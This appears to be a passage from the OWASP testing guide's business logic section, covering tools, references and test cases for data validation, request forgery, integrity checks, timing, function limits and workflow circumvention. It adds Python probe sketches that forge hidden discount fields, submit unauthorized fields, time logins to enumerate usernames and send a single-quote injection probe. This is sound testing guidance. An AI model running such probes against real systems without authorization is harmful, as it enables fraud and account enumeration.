Miscellaneous Test Tools • Web Developer toolbar - https://chrome.google.com/webstore/detail/bfbameneiokkgbdmiekhjnmfkcnldhhm The Web Developer extension adds a toolbar button to the browser with various web developer tools. This is the official port of the Web Developer extension for Firefox. • HTTP Request Maker - https://chrome.google.com/webstore/ detail/kajfghlhfkcocafkcjlajldicbikpgnp?hl=en-US Request Maker is a tool for penetration testing. With it you can easily capture requests made by web pages, tamper with the URL, headers and POST data and, of course, make new requests • Cookie Editor - https://chrome.google.com/webstore/detail/ fngmhnnpilhplaeedifhccceomclgfbg?hl=en-US Edit This Cookie is a cookie manager. You can add, delete, edit, search, protect and block cookies • Session Manager - https://chrome.google.com/webstore/detail/bbcnbpafconjjigibnhbfmmgdbbkcjfi With Session Manager you can quickly save your current browser state and reload it whenever necessary. 
You can manage multiple sessions, rename or remove them from the session library. Each session remembers the state of the browser at its creation time, i.e. the opened tabs and windows. Once a session is opened, the browser is restored to its state. site you use, with all your accounts; if you want to use another account just swap profile! • HTTP Response Browser - https://chrome.google.com/webstore/detail/mgekankhbggjkjpcbhacjgflbacnpljm?hl=en-US Make HTTP requests from your browser and browse the response (HTTP headers and source). Send HTTP method, headers and body using XMLHttpRequest from your browser then view the HTTP status, headers and source. Click links in the headers or body to issue new requests. This plug-in formats XML responses and uses Syntax Highlighter < http://alexgorbatchev.com/ >. • Firebug lite for Chrome - https://chrome.google.com/webstore/detail/bmagokdooijbeehmkpknfglimnifench Firebug Lite is not a substitute for Firebug, or Chrome Developer Tools. It is a tool to be used in conjunction with these tools. Firebug Lite provides the rich visual representation we are used to see in Firebug when it comes to HTML elements, DOM elements, and Box Model shading. It provides also some cool features like inspecting HTML elements with your mouse, and live editing CSS properties. References Whitepapers • Business Logic Vulnerabilities in Web Applications http://www.google.com/url?sa=t&rct=j&q=BusinessLogicVulnerabilities.pdf&source=web&cd=1&cad=rja&ved=0CDIQFjAA&url=http%3A%2F%2Faccorute.googlecode. com%2Ffiles%2FBusinessLogicVulnerabilities.pdf&ei=2Xj9UJO5LYaB0QHakwE&usg=AFQjCNGlAcjK2uz2U87bTjTHjJ-T0T3THg&bvm=bv.41248874,d.dmg • The Common Misuse Scoring System (CMSS): Metrics for Software Feature Misuse Vulnerabilities - NISTIR 7864 - http://csrc. nist.gov/publications/nistir/ir7864/nistir-7864.pdf • Designing a Framework Method for Secure Business Application Logic Integrity in e-Commerce Systems, Faisal Nabi http://ijns.femto.com.tw/contents/ijns-v12-n1/ijns-2011-v12n1-p29-41.pdf • Finite State testing of Graphical User Interfaces, Fevzi Belli http://www.slideshare.net/Softwarecentral/finitestate-testing-of-graphical-user-interfaces • Principles and Methods of Testing Finite State Machines - A Survey, David Lee, Mihalis Yannakakis - http://www.cse.ohiostate.edu/~lee/english/pdf/ieee-proceeding-survey.pdf • Security Issues in Online Games, Jianxin Jeff Yan and Hyun-Jin Choi - http://homepages.cs.ncl.ac.uk/jeff.yan/TEL.pdf • Cookie Swap - https://chrome.google.com/webstore/detail/ dffhipnliikkblkhpjapbecpmoilcama?hl=en-US • Securing Virtual Worlds Against Real Attack, Dr. Igor Muttik, McAfee - https://www.info-point-security.com/open_downloads/2008/McAfee_wp_online_gaming_0808.pdf Swap My Cookies is a session manager, it manages your cookies, letting you login on any website with several different accounts. 
You can finally login into Gmail, yahoo, hotmail, and just any web- • Seven Business Logic Flaws That Put Your Website At Risk – Jeremiah Grossman Founder and CTO, WhiteHat Security https://www.whitehatsec.com/resource/whitepapers/busi- 179 Web Application Penetration Testing ness_logic_flaws.html • Toward Automated Detection of Logic Vulnerabilities in Web Applications - Viktoria Felmetsger Ludovico Cavedon Christopher Kruegel Giovanni Vigna - https://www.usenix.org/legacy/ event/sec10/tech/full_papers/Felmetsger.pdf Business_Logic_White_Paper.pdf Books • The Decision Model: A Business Logic Framework Linking Business and Technology, By Barbara Von Halle, Larry Goldberg, Published by CRC Press, ISBN1420082817 (2010) • 2012 Web Session Intelligence & Security Report: Business Logic Abuse, Dr. Ponemon - http://www.emc.com/collateral/ rsa/silvertail/rsa-silver-tail-ponemon-ar.pdf Test business logic data validation (OTG-BUSLOGIC-001) • 2012 Web Session Intelligence & Security Report: Business Logic Abuse (UK) Edition, Dr. Ponemon - http://buzz.silvertailsystems.com/Ponemon_UK.htm OWASP Related • Business Logic Attacks – Bots and Bats, Eldad Chai - http:// www.imperva.com/resources/adc/pdfs/AppSecEU09_BusinessLogicAttacks_EldadChai.pdf • OWASP Detail Misuse Cases - https://www.owasp.org/index. php/Detail_misuse_cases • How to Prevent Business Flaws Vulnerabilities in Web Applications, Marco Morana - http://www.slideshare.net/marco_morana/issa-louisville-2010morana Useful Web Sites • Abuse of Functionality - http://projects.webappsec.org/w/ page/13246913/Abuse-of-Functionality • Business logic - http://en.wikipedia.org/wiki/Business_logic • Business Logic Flaws and Yahoo Games - http://jeremiahgrossman.blogspot.com/2006/12/business-logic-flaws.html • CWE-840: Business Logic Errors - http://cwe.mitre.org/data/ definitions/840.html • Defying Logic: Theory, Design, and Implementation of Complex Systems for Testing Application Logic http://www.slideshare.net/RafalLos/defying-logic-business-logic-testing-with-automation • Prevent application logic attacks with sound app security practices http://searchappsecurity.techtarget. co m /qn a /0, 2 8 9202 ,si d 92_g c i1213 424 ,0 0 . h t m l ? b u c ket=NEWS&topic=302570 • Real-Life Example of a ‘Business Logic Defect - http://h30501. www3.hp.com/t5/Following-the-White-Rabbit-A/Real-LifeExample-of-a-Business-Logic-Defect-Screen-Shots/bap/22581 • Software Testing Lifecycle - http://softwaretestingfundamentals.com/software-testing-life-cycle/ • Top 10 Business Logic Attack Vectors Attacking and Exploiting Business Application Assets and Flaws – Vulnerability Detection to Fix http://www.ntobjectives.com/go/business-logic-attack-vectors-white-paper/ and http://www.ntobjectives.com/files/ Summary The application must ensure that only logically valid data can be entered at the front end as well as directly to the server side of an application of system. Only verifying data locally may leave applications vulnerable to server injections through proxies or at handoffs with other systems. This is different from simply performing Boundary Value Analysis (BVA) in that it is more difficult and in most cases cannot be simply verified at the entry point, but usually requires checking some other system. For example: An application may ask for your Social Security Number. In BVA the application should check formats and semantics (is the value 9 digits long, not negative and not all 0’s) for the data entered, but there are logic considerations also. 
SSNs are grouped and categorized. Is this person on a death file? Are they from a certain part of the country?

Vulnerabilities related to business data validation are unique in that they are application specific, and they differ from the vulnerabilities related to forging requests in that they are more concerned with logical data as opposed to simply breaking the business logic workflow. The front end and the back end of the application should verify and validate that the data the application has, is using, and is passing along is logically valid. Even if the user provides valid data to an application, the business logic may make the application behave differently depending on data or circumstances.

Examples

Example 1
Suppose you manage a multi-tiered e-commerce site that allows users to order carpet. The user selects their carpet, enters the size, makes the payment, and the front end application has verified that all entered information is correct and valid for contact information, size, make and color of the carpet. But the business logic in the background has two paths: if the carpet is in stock it is shipped directly from your warehouse, but if it is out of stock in your warehouse a call is made to a partner's system, and if they have it in stock they will ship the order from their warehouse and be reimbursed for it. What happens if an attacker is able to continue a valid in-stock transaction and send it as out-of-stock to your partner? What happens if an attacker is able to get in the middle and send messages to the partner warehouse ordering carpet without payment?

Example 2
Many credit card systems now download account balances nightly so that customers can check out more quickly for amounts under a certain value. The inverse is also true: if I pay my credit card off in the morning, I may not be able to use the available credit in the evening. Similarly, if I use my credit card at multiple locations very quickly, it may be possible to exceed my limit if the systems are basing decisions on last night's data.

How to Test

Generic Test Method
• Review the project documentation and use exploratory testing looking for data entry points or hand-off points between systems or software.
• Once found, try to insert logically invalid data into the application/system.

Specific Testing Method:
• Perform front-end GUI functional validation testing on the application to ensure that only "valid" values are accepted.
• Using an intercepting proxy, observe the HTTP POST/GET traffic looking for places where variables such as cost and quantity are passed. Specifically, look for "hand-offs" between applications/systems that may be possible injection or tamper points.
• Once variables are found, start interrogating the field with logically "invalid" data, such as social security numbers or unique identifiers that do not exist or that do not fit the business logic. This testing verifies that the server functions properly and does not accept logically invalid data.

Related Test Cases
• All Input Validation test cases
• Testing for Account Enumeration and Guessable User Account (OTG-IDENT-004)
• Testing for Bypassing Session Management Schema (OTG-SESS-001)
• Testing for Exposed Session Variables (OTG-SESS-004)

Tools
• OWASP Zed Attack Proxy (ZAP) - https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
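As a complement to proxy-based testing, the probe below shows the idea of sending well-formed but logically invalid data straight to the server side, as described in the specific testing method above. It is only a sketch using Python's requests library: the endpoint, field names and the example checks are hypothetical and would be replaced by values relevant to the application under test.

import requests

session = {"JSESSIONID": "cookie-value-from-an-authenticated-session"}
url = "https://app.example/account/update"

# "000-00-0000" passes a simple 9-digit format check but is not a valid SSN,
# and a negative quantity is well-formed as a number yet logically impossible.
payloads = [
    {"ssn": "000-00-0000"},
    {"order_quantity": "-5"},
]

for payload in payloads:
    resp = requests.post(url, data=payload, cookies=session)
    # A logically-aware back end should reject these; a success response
    # suggests validation happens only in the front-end GUI.
    print(payload, resp.status_code)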
References
• Beginning Microsoft Visual Studio LightSwitch Development - http://books.google.com/books?id=x76L_kaTgdEC&pg=PA280&lpg=PA280&dq=business+logic+example+valid+data+example&source=bl&ots=GOfQ-7f4Hu&sig=4jOejZVligZOrvjBFRAT4-jy8DI&hl=en&sa=X&ei=mydYUt6qEOX54APu7IDgCQ&ved=0CFIQ6AEwBDgK#v=onepage&q=business%20logic%20example%20valid%20data%20example&f=false

Remediation
The application/system must ensure that only "logically valid" data is accepted at all input and hand-off points of the application or system, and that data is not simply trusted once it has entered the system.

Test Ability to forge requests (OTG-BUSLOGIC-002)

Summary
Forging requests is a method that attackers use to circumvent the front end GUI application and directly submit information for back end processing. The goal of the attacker is to send HTTP POST/GET requests, through an intercepting proxy, with data values that are not supported, guarded against or expected by the application's business logic. Some examples of forged requests include exploiting guessable or predictable parameters, or exposing "hidden" features and functionality such as enabling debugging or presenting special screens or windows that are very useful during development but may leak information or bypass the business logic.

Vulnerabilities related to the ability to forge requests are unique to each application and differ from business logic data validation in that their focus is on breaking the business logic workflow. Applications should have logic checks in place to prevent the system from accepting forged requests that may give attackers the opportunity to exploit the business logic, process, or flow of the application. Request forgery is nothing new; the attacker uses an intercepting proxy to send HTTP POST/GET requests to the application. Through request forgeries attackers may be able to circumvent the business logic or process by finding, predicting and manipulating parameters to make the application think a process or task has or has not taken place.

Also, forged requests may allow subversion of the programmatic or business logic flow by invoking "hidden" features or functionality, such as debugging, initially used by developers and testers and sometimes referred to as an "Easter egg". "An Easter egg is an intentional inside joke, hidden message, or feature in a work such as a computer program, movie, book, or crossword. According to game designer Warren Robinett, the term was coined at Atari by personnel who were alerted to the presence of a secret message which had been hidden by Robinett in his already widely distributed game, Adventure. The name has been said to evoke the idea of a traditional Easter egg hunt." http://en.wikipedia.org/wiki/Easter_egg_(media)

Examples

Example 1
Suppose an e-commerce theater site allows users to select their ticket, apply a one-time 10% senior discount on the entire sale, view the subtotal and tender the sale. If an attacker is able to see through a proxy that the application has a hidden field (of 1 or 0) used by the business logic to determine whether a discount has been taken or not, the attacker is then able to submit the "no discount has been taken" value multiple times to take advantage of the same discount multiple times.
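A sketch of how the hidden-field manipulation in Example 1 might be exercised with Python's requests library follows. The endpoint, field names and the meaning of the flag (0 = "no discount has been taken") are hypothetical and would be derived from what the intercepting proxy shows.

import requests

session = {"JSESSIONID": "cookie-value-captured-from-the-browser"}
url = "https://tickets.example/cart/applyDiscount"

# The GUI sets discount_taken=1 after the senior discount is used once.
# Re-submitting the request with the flag forced back to 0 tests whether
# the server keeps its own count or trusts the client-side state.
for attempt in range(3):
    resp = requests.post(
        url,
        data={"discount_code": "SENIOR10", "discount_taken": "0"},
        cookies=session,
    )
    print(attempt, resp.status_code, resp.text[:120])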
Example 2
Suppose an online video game pays out tokens for points scored for finding pirates' treasure and pirates, and for each level completed. These tokens can later be exchanged for prizes. Additionally, each level's points have a multiplier value equal to the level. If an attacker was able to see through a proxy that the application has a hidden field used during development and testing to quickly get to the highest levels of the game, they could quickly get to the highest levels and accumulate unearned points.

Also, if an attacker was able to see through a proxy that the application has a hidden field used during development and testing to enable a log that indicated where other online players or hidden treasure were in relation to the attacker, they would then be able to quickly go to these locations and score points.

Debugging features which remain present in the final game - http://glitchcity.info/wiki/index.php/List_of_video_games_with_debugging_features#Debugging_features_which_remain_present_in_the_final_game

How to Test

Generic Testing Method
• Review the project documentation and use exploratory testing looking for guessable, predictable or hidden functionality of fields.
• Once found, try to insert logically valid data into the application/system allowing the user to go through the application/system against the normal business logic workflow.

Specific Testing Method 1
• Using an intercepting proxy, observe the HTTP POST/GET traffic looking for some indication that values are incrementing at a regular interval or are easily guessable.
• If it is found that some value is guessable, this value may be changed and one may gain unexpected visibility.

Specific Testing Method 2
• Using an intercepting proxy, observe the HTTP POST/GET traffic looking for some indication of hidden features, such as debug switches that can be turned on or activated.
• If any are found, try to guess and change these values to get a different application response or behavior.

Related Test Cases
• Testing for Exposed Session Variables (OTG-SESS-004)
• Testing for Cross Site Request Forgery (CSRF) (OTG-SESS-005)
• Testing for Account Enumeration and Guessable User Account (OTG-IDENT-004)

Tools
• OWASP Zed Attack Proxy (ZAP) - https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

References
• Cross Site Request Forgery - Legitimizing Forged Requests - http://fragilesecurity.blogspot.com/2012/11/cross-site-request-forgery-legitimazing.html
• Easter egg - http://en.wikipedia.org/wiki/Easter_egg_(media)
• Top 10 Software Easter Eggs - http://lifehacker.com/371083/top-10-software-easter-eggs

Remediation
The application must be smart enough and designed with business logic that will prevent attackers from predicting and manipulating parameters to subvert the programmatic or business logic flow, or from exploiting hidden/undocumented functionality such as debugging.

Test integrity checks (OTG-BUSLOGIC-003)

Summary
Many applications are designed to display different fields depending on the user or situation by leaving some inputs hidden.
However, in many cases it is possible to submit hidden field values to the server using a proxy. In these cases the server side controls must be smart enough to perform relational or server side edits to ensure that only the proper data reaches the server, based on user and application specific business logic.

Additionally, the application must not depend on non-editable controls, drop-down menus or hidden fields for business logic processing, because these fields remain non-editable only in the context of the browser. Users may be able to edit their values using proxy editor tools and try to manipulate the business logic. If the application exposes values related to business rules, like quantity, as non-editable fields, it must maintain a copy on the server side and use that copy for business logic processing. Finally, aside from application/system data, log systems must be secured to prevent unauthorized reading, writing and updating.

Business logic integrity check vulnerabilities are unique in that these misuse cases are application specific; if users are able to make changes, they should only be able to write or update/edit specific artifacts at specific times, per the business process logic. The application must be smart enough to check for relational edits and not allow users to submit information directly to the server that is not valid, that is trusted simply because it came from non-editable controls, or that the user is not authorized to submit through the front end. Additionally, system artifacts such as logs must be "protected" from unauthorized reading, writing and removal.

Examples

Example 1
Imagine an ASP.NET GUI application that only allows the admin user to change the passwords of other users in the system. The admin user will see the username and password fields to enter a username and password, while other users will not see either field. However, if a non-admin user submits information in the username and password fields through a proxy, they may be able to "trick" the server into believing that the request has come from an admin user and change the passwords of other users.

Example 2
Most web applications have dropdown lists making it easy for the user to quickly select their state, month of birth, etc. Suppose a project management application allowed users to log in and, depending on their privileges, presented them with a drop-down list of the projects they have access to. What happens if an attacker finds the name of another project that they should not have access to and submits that information via a proxy? Will the application give access to the project? They should not have access, even though they skipped an authorization business logic check.

Example 3
Suppose a motor vehicle administration system requires an employee to initially verify each citizen's documentation and information when issuing an identification card or driver's license. At this point the business process has created data with a high level of integrity, as the integrity of the submitted data is checked by the application. Now suppose the application is moved to the Internet so that employees can log on for full service, or citizens can log on for a reduced self-service application to update certain information. At this point an attacker may be able to use an intercepting proxy to add or update data that they should not have access to, and they could destroy the integrity of the data by stating that the citizen was not married but supplying data for a spouse's name. This type of inserting or updating of unverified data destroys the data integrity and might have been prevented if the business process logic was followed.
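For a scenario like Example 3, a tester could submit fields through the self-service endpoint that the reduced GUI never exposes and check whether the back end performs its own authorization and relational edits. This is a hedged sketch with Python's requests library; the endpoint and field names are hypothetical.

import requests

citizen_session = {"JSESSIONID": "cookie-value-of-a-self-service-citizen-account"}
url = "https://mva.example/records/update"

# The self-service form only exposes address and phone fields, but the full-service
# employee form also carries marital status and spouse data. Submitting those
# extra fields from the citizen session tests the server-side integrity checks.
data = {
    "address": "1 Main Street",
    "marital_status": "single",
    "spouse_name": "Injected Spouse",   # field the citizen GUI never shows
}

resp = requests.post(url, data=data, cookies=citizen_session)
print(resp.status_code, resp.text[:200])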
Example 4
Many systems include logging for auditing and troubleshooting purposes. But how good/valid is the information in these logs? Can they be manipulated by attackers, either intentionally or accidentally, having their integrity destroyed?

How to Test

Generic Testing Method
• Review the project documentation and use exploratory testing looking for parts of the application/system (components, e.g. input fields, databases or logs) that move, store or handle data/information.
• For each identified component, determine what type of data/information is logically acceptable and what types the application/system should guard against. Also consider who, according to the business logic, is allowed to insert, update and delete data/information in each component.
• Attempt to insert, update or delete data/information values with invalid data/information in each component (i.e. input, database, or log), using users that should not be allowed to do so per the business logic workflow.

Specific Testing Method 1
• Using a proxy, capture HTTP traffic looking for hidden fields.
• If a hidden field is found, see how these fields compare with the GUI application and start interrogating this value through the proxy by submitting different data values, trying to circumvent the business process and manipulate values you were not intended to have access to.

Specific Testing Method 2
• Using a proxy, capture HTTP traffic looking for a place to insert information into areas of the application that are non-editable.
• If one is found, see how these fields compare with the GUI application and start interrogating this value through the proxy by submitting different data values, trying to circumvent the business process and manipulate values you were not intended to have access to.

Specific Testing Method 3
• List components of the application or system that could be edited, for example logs or databases.
• For each component identified, try to read, edit or remove its information. For example, log files should be identified and testers should try to manipulate the data/information being collected.

Related Test Cases
• All Input Validation test cases

Tools
• Various system/application tools such as editors and file manipulation tools.
• OWASP Zed Attack Proxy (ZAP) - https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

References
• Implementing Referential Integrity and Shared Business Logic in a RDB - http://www.agiledata.org/essays/referentialIntegrity.html
• On Rules and Integrity Constraints in Database Systems - http://www.comp.nus.edu.sg/~lingtw/papers/IST92.teopk.pdf
• Use referential integrity to enforce basic business rules in Oracle - http://www.techrepublic.com/article/use-referential-integrity-to-enforce-basic-business-rules-in-oracle/
• Maximizing Business Logic Reuse with Reactive Logic - http://architects.dzone.com/articles/maximizing-business-logic
• Tamper Evidence Logging - http://tamperevident.cs.rice.edu/Logging.html

Remediation
The application must be smart enough to check for relational edits and not allow users to submit information directly to the server that is not valid, that is trusted simply because it came from non-editable controls, or that the user is not authorized to submit through the front end. Additionally, any component that can be edited must have mechanisms in place to prevent unintentional or intentional writing or updating.

Test for Process Timing (OTG-BUSLOGIC-004)

Summary
It is possible that attackers can gather information on an application by monitoring the time it takes to complete a task or give a response. Additionally, attackers may be able to manipulate and break designed business process flows by simply keeping active sessions open and not submitting their transactions in the "expected" time frame.

Process timing logic vulnerabilities are unique in that these manual misuse cases should be created considering execution and transaction timing that is application/system specific. Processing timing may give away or leak information on what is being done in the application/system background processes. If an application allows users to guess what the particular next outcome will be based on processing time variations, users will be able to adjust accordingly and change behavior based on the expectation and "game the system".

Examples

Example 1
Video gambling/slot machines may take longer to process a transaction just prior to a large payout. This would allow astute gamblers to gamble minimum amounts until they see the long process time, which would then prompt them to bet the maximum.

Example 2
Many system log-on processes ask for the user name and password. If you look closely, you may be able to see that entering an invalid user name and invalid password takes more time to return an error than entering a valid username and invalid password. This may allow the attacker to know whether they have a valid username without needing to rely on the GUI message.

Example 3
Most arenas or travel agencies have ticketing applications that allow users to purchase tickets and reserve seats. When the user requests the tickets, seats are locked or reserved pending payment. What if an attacker keeps reserving seats but never checks out? Will the seats be released, or will no tickets be sold? Some ticket vendors now only allow users 5 minutes to complete a transaction before the transaction is invalidated.

Example 4
Suppose a precious metals e-commerce site allows users to make purchases with a price quote based on the market price at the time they log on. What if an attacker logs on and places an order but does not complete the transaction until later in the day, and only if the price of the metals goes up? Will the attacker get the initial lower price?
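The username-enumeration case in Example 2 can be checked by timing otherwise identical login attempts. The following is a rough sketch only, using Python's requests library and time.perf_counter(); the login URL and field names are hypothetical, and several samples per username would be needed in practice to smooth out network jitter.

import time
import requests

url = "https://app.example/login"
candidates = ["known_valid_user", "almost_certainly_invalid_user_xyz"]

for username in candidates:
    start = time.perf_counter()
    requests.post(url, data={"username": username, "password": "WrongPassword!"})
    elapsed = time.perf_counter() - start
    # A consistent, measurable difference between valid and invalid usernames
    # suggests the application leaks account existence through processing time.
    print("%-35s %.3f s" % (username, elapsed))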
How to Test
• Review the project documentation and use exploratory testing looking for application/system functionality that may be impacted by time, such as execution time, or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow (for example, not completing transactions in an expected time).
• Develop and execute the misuse cases, ensuring that attackers cannot gain an advantage based on any timing.

Related Test Cases
• Testing for Cookies attributes (OTG-SESS-002)
• Test Session Timeout (OTG-SESS-007)

References
None

Remediation
Develop applications with processing time in mind. If attackers could possibly gain some type of advantage from knowing the different processing times and results, add extra steps or processing so that, no matter the result, responses are provided in the same time frame. Additionally, the application/system must have mechanisms in place that do not allow attackers to extend transactions over an "acceptable" amount of time. This may be done by cancelling or resetting transactions after a specified amount of time has passed, as some ticket vendors are now doing.

Test number of times a function can be used limits (OTG-BUSLOGIC-005)

Summary
Many of the problems that applications solve require limits on the number of times a function can be used or an action can be executed. Applications must be "smart enough" to not allow the user to exceed their limit on the use of these functions, since in many cases each time the function is used the user may gain some type of benefit that must be accounted for to properly compensate the owner. For example, an e-commerce site may only allow users to apply a discount once per transaction, or some applications may be on a subscription plan and only allow users to download three complete documents monthly.

Vulnerabilities related to testing for function limits are application specific, and misuse cases must be created that strive to exercise parts of the application, functions or actions more than the allowable number of times. Attackers may be able to circumvent the business logic and execute a function more times than "allowable", exploiting the application for personal gain.

Example
Suppose an e-commerce site allows users to take advantage of any one of many discounts on their total purchase and then proceed to checkout and tendering. What happens if the attacker navigates back to the discounts page after taking and applying the one "allowable" discount? Can they take advantage of another discount? Can they take advantage of the same discount multiple times?

How to Test
• Review the project documentation and use exploratory testing looking for functions or features in the application or system that should not be executed more than a single time or a specified number of times during the business logic workflow.
• For each of the functions and features found that should only be executed a single time or a specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute them more than the allowable number of times. For example, can a user navigate back and forth through the pages multiple times, executing a function that should only execute once? Or can a user load and unload shopping carts, allowing for additional discounts?
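The subscription example from the summary (three document downloads per month) can be probed by simply requesting a fourth and fifth document and seeing whether the server, rather than the GUI, enforces the counter. A minimal sketch with Python's requests library follows; the endpoint, document identifiers and limit are hypothetical.

import requests

session = {"JSESSIONID": "cookie-value-of-a-subscriber-session"}
url = "https://docs.example/download"

# The plan allows three downloads per month; requesting a fourth and fifth
# document checks whether the limit is enforced server side or only in the GUI.
for doc_id in ["1001", "1002", "1003", "1004", "1005"]:
    resp = requests.get(url, params={"doc": doc_id}, cookies=session)
    print(doc_id, resp.status_code, resp.headers.get("Content-Type"))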
Related Test Cases
• Testing for Account Enumeration and Guessable User Account (OTG-IDENT-004)
• Testing for Weak lock out mechanism (OTG-AUTHN-003)

References
• InfoPath Forms Services business logic exceeded the maximum limit of operations Rule - http://mpwiki.viacode.com/default.aspx?g=posts&t=115678
• Gold Trading Was Temporarily Halted On The CME This Morning - http://www.businessinsider.com/gold-halted-on-cme-for-stop-logic-event-2013-10

Remediation
The application should have checks to ensure that the business logic is being followed and that, if a function/action can only be executed a certain number of times, the user can no longer execute the function once the limit is reached. To prevent users from using a function more than the appropriate number of times, the application may use mechanisms such as cookies to keep count, or sessions that do not allow users to execute the function additional times.

Testing for the Circumvention of Work Flows (OTG-BUSLOGIC-006)

Summary
Workflow vulnerabilities involve any type of vulnerability that allows the attacker to misuse an application/system in a way that allows them to circumvent (not follow) the designed/intended workflow. "A workflow consists of a sequence of connected steps where each step follows without delay or gap and ends just before the subsequent step may begin. It is a depiction of a sequence of operations, declared as work of a person or group, an organization of staff, or one or more simple or complex mechanisms. Workflow may be seen as any abstraction of real work." (https://en.wikipedia.org/wiki/Workflow)

The application's business logic must require that the user complete specific steps in the correct/specific order and, if the workflow is terminated without correctly completing, that all actions and spawned actions are "rolled back" or canceled. Vulnerabilities related to the circumvention of workflows or bypassing the correct business logic workflow are unique in that they are very application/system specific, and careful manual misuse cases must be developed using requirements and use cases. The application's business process must have checks to ensure that the user's transactions/actions are proceeding in the correct/acceptable order, and if a transaction triggers some sort of action, that action will be "rolled back" and removed if the transaction is not successfully completed.

Examples

Example 1
Many of us receive some type of "club/loyalty points" for purchases from grocery stores and gas stations. Suppose a user was able to start a transaction linked to their account and then, after points have been added to their club/loyalty account, cancel out of the transaction or remove items from their "basket" before tendering. In this case the system either should not apply points/credits to the account until the sale is tendered, or points/credits should be "rolled back" if the point/credit increment does not match the final tender. With this in mind, an attacker may start transactions and cancel them to build up their point levels without actually buying anything.

Example 2
An electronic bulletin board system may be designed to ensure that initial posts do not contain profanity, based on a list that the post is compared against. If a word on the "black" list is found in the user-entered text, the submission is not posted. But once a submission is posted, the submitter can access, edit, and change the submission contents to include words on the profanity/black list, since on edit the posting is never compared again. Keeping this in mind, attackers may open an initial blank or minimal discussion and then add in whatever they like as an update.
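A sketch of how the loyalty-point scenario in Example 1 might be scripted during a test: start an order so that points are credited, cancel it, and then compare the points balance before and after. Python's requests library is used, and the endpoints, parameters and response format are hypothetical.

import requests

session = {"JSESSIONID": "cookie-value-of-a-loyalty-member-session"}
base = "https://store.example"

def points_balance():
    # Hypothetical JSON endpoint returning {"points": <int>} for the logged-in member.
    return requests.get(base + "/loyalty/balance", cookies=session).json()["points"]

before = points_balance()

# Start a transaction large enough to earn points, then cancel it before tendering.
order = requests.post(base + "/orders", data={"item_id": "77", "quantity": "10"},
                      cookies=session).json()
requests.post(base + "/orders/%s/cancel" % order["order_id"], cookies=session)

after = points_balance()
# If the balance increased even though nothing was tendered, the workflow
# does not roll back the spawned points-credit action.
print("points before: %d, after cancellation: %d" % (before, after))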
How to Test

Generic Testing Method
• Review the project documentation and use exploratory testing looking for methods to skip steps, or to go through steps in the application process, in a different order from the designed/intended business logic flow.
• For each method, develop a misuse case and try to circumvent the workflow or perform an action that is "not acceptable" per the business logic workflow.

Testing Method 1
• Start a transaction, going through the application past the point that triggers credits/points to the user's account.
• Cancel out of the transaction, or reduce the final tender so that the point values should be decreased, and check the points/credit system to ensure that the proper points/credits were recorded.

Testing Method 2
• On a content management or bulletin board system, enter and save valid initial text or values.
• Then try to append, edit and remove data that would leave the existing data in an invalid state or with invalid values, to ensure that the user is not allowed to save the incorrect information. Some "invalid" data or information may be specific words (profanity) or specific topics (such as political issues).

Related Test Cases
• Testing Directory traversal/file include (OTG-AUTHZ-001)
• Testing for bypassing authorization schema (OTG-AUTHZ-002)
• Testing for Bypassing Session Management Schema (OTG-SESS-001)
• Test Business Logic Data Validation (OTG-BUSLOGIC-001)
• Test Ability to Forge Requests (OTG-BUSLOGIC-002)
• Test Integrity Checks (OTG-BUSLOGIC-003)
• Test for Process Timing (OTG-BUSLOGIC-004)
• Test Number of Times a Function Can be Used Limits (OTG-BUSLOGIC-005)
• Test Defenses Against Application Mis-use (OTG-BUSLOGIC-007)
• Test Upload of Unexpected File Types (OTG-BUSLOGIC-008)
• Test Upload of Malicious Files (OTG-BUSLOGIC-009)

References
• OWASP Detail Misuse Cases - https://www.owasp.org/index.php/Detail_misuse_cases
• Real-Life Example of a ‘Business Logic Defect’ - http://h30501.www3.hp.com/t5/Following-the-White-Rabbit-A/Real-Life-Example-of-a-Business-Logic-Defect-Screen-Shots/ba-p/22581
• Top 10 Business Logic Attack Vectors Attacking and Exploiting Business Application Assets and Flaws – Vulnerability Detection to Fix - http://www.ntobjectives.com/go/business-logic-attack-vectors-white-paper/ and http://www.ntobjectives.com/files/Business_Logic_White_Paper.pdf
• CWE-840: Business Logic Errors - http://cwe.mitre.org/data/definitions/840.html

Remediation
The application must be self-aware and have checks in place ensuring that users complete each step in the workflow process in the correct order, and it must prevent attackers from circumventing, skipping, or repeating any steps/processes in the workflow. Testing for workflow vulnerabilities involves developing business logic abuse/misuse cases with the goal of successfully completing the business process while not completing the correct steps in the correct order.

Test defenses against application mis-use (OTG-BUSLOGIC-007)

Summary
The misuse and invalid use of valid functionality can identify attacks attempting to enumerate the web application, identify weaknesses, and exploit vulnerabilities. Tests should be undertaken to determine whether there are application-layer defensive mechanisms in place to protect the application. The lack of active defenses allows an attacker to hunt for vulnerabilities without any recourse. The application's owner will thus not know their application is under attack.
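One way to exercise this during an engagement is to script a short sequence of clearly anomalous requests, similar to the example that follows, and watch whether the application's behaviour changes (lockout, delays, altered responses). This is a hedged sketch with Python's requests library; the endpoint and parameters are hypothetical.

import requests

session = {"JSESSIONID": "cookie-value-of-an-authenticated-test-account"}
url = "https://app.example/files/download"

# A sequence no ordinary user would produce: a forbidden ID, a single tick,
# and an unexpected extra parameter.
probes = [
    {"id": "999999"},                      # file the role should not reach
    {"id": "'"},                           # single tick instead of a number
    {"id": "1", "debug": "1"},             # extra, undocumented parameter
]

for probe in probes:
    resp = requests.get(url, params=probe, cookies=session)
    print(probe, resp.status_code, resp.elapsed.total_seconds())

# If status codes, timing and content stay identical throughout, and the session
# is never challenged or terminated, the application shows no sign of active defenses.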
Example
An authenticated user undertakes the following (unlikely) sequence of actions:
